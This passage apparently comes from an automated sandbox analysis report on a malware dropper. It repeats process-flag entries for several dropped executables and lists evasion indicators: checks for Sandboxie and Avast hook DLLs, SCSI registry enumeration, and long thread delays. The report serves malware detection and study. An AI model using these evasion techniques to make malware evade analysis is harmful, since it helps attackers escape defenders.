                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exE | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\taskkill.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | File opened: \Device\RasAcd count: 31030
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | API/Special instruction interceptor: Address: 7FFE2220E814
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000000.1712015899.0000000000E62000.00000002.00000001.01000000.0000000F.sdmp, Mon178817e243.exe.1.dr | Binary or memory string: SBIEDLL.DLL
                  Source: Mon17f45359eb9.exe, 00000018.00000002.1991320928.000000000175B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOKZ
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Memory allocated: 2BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Memory allocated: 2E40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Memory allocated: 2C70000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Memory allocated: 16A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Memory allocated: 1B140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Memory allocated: CA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Memory allocated: 2780000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Memory allocated: 4780000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | Memory allocated: 9B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | Memory allocated: 1A450000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Memory allocated: 3470000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Memory allocated: 37D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Memory allocated: 35E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Memory allocated: 6F40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | Memory allocated: 31B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Memory allocated: 2530000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Memory allocated: 2760000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Memory allocated: 2680000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Memory allocated: 57E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Memory allocated: 5060000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 599886
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 599543
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 599424
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 599303
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 599172
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 599048
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 598922
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 598812
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 598671
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 598333
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 598187
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 597992
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 597867
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 597746
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 597578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 597440
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 597307
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 597182
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 597015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 596892
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 596771
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 596497
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 596359
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 596156
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 596020
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 595859
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 595250
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 594844
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 594699
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 594578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 594422
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 594265
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 594071
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 593916
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 593784
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 593625
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 593484
